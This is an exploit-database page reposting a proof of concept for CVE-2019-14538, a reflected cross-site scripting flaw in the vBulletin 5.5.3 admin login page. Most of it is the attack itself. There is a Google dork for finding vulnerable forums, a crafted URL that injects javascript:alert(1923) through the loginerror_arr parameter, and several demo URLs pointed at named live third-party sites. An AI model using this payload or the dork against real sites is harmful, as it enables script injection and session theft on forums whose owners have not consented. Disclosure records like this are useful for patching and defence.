Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2019-14538 | CWE-79 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
N/A | High | Remote | 2019-08-25 |
CVSS | EPSS | EPSSP |
---|---|---|
Not available | 0.02192 | 0.50148 |
# Exploit Title: vBulletin Reflected XSS via "Click here" # Google Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright 2019 MH Sub I, LLC dba vBulletin" # Date: 05/08/2019 # Exploit Author: TrazeR / AKNCLAR # Vendor Homepage: https://www.vbulletin.com/ # Software Link: https://www.vbulletin.com/download.php # Version: vBulletin 5.5.3 # Tested on: Windows 10 # CVE : CVE-2019-14538 ################################################################################# Dork: intext : "Powered by vBulletin Version 5.5.3 Copyright 2019 MH Sub I, LLC dba vBulletin" vBulletin 5.5.3 Reflected XSS via "Click here" Payload: /admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin (Click here!) click here xss will work Demo : https://forum.vbulletin.com/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://www.scootersoftware.com/vbulletin//admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://www.photorials.nl/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin https://powerhacker.net/admincp/index.php?loginerror_arr[0]=badlogin_strikes_logintypeusername&loginerror_arr[1]=javascript:alert(1923)&loginerror_arr[2]=1&vb_login_username=admin screenshot: https://imguploads.net/images/2019/08/25/vbulletin-xss-trazer.png #################################################################################
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.